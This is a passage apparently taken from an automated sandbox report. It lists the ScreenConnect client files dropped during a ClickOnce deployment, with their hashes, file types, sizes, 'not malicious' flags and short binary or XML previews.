                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                                        Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                        MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                        SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                        SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                        SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                        Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                        MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                        SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                        SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                        SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............" ..0.............. ... ...@....... ....................................@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                                        Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                        MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                        SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                        SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                        SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                        Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                        MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                        SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                        SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):548352
                                                                                                                                                                                                                                                        Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                        MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                        SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                        SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                        SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iB............" ..0..V...........p... ........... ....................................@.................................qp..O.......t............................o..8............................................ ............... ..H............text....T... ...V.................. ..`.rsrc...t............X..............@..@.reloc...............\..............@..B.................p......H........B...,..................To........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                                        Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                        MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                        SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                        SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                        SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                        Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                        MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                        SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                        SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                        SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..>...........\... ...`....... ...............................o....@.................................?\..O....`..|............................[..8............................................ ............... ..H............text....<... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................s\......H.......H..................0....[........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                                        Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                        MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                        SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                        SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                        SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                        Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                        MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                        SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                        SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                        SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):600864
                                                                                                                                                                                                                                                        Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                        MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                        SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                        SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`...........@.................................5...O.... .................. )...@..........8............................................ ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H....... F................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.genman

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                                        Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                        MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                        SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                        SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                        SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                                        Entropy (8bit):5.954498332217529
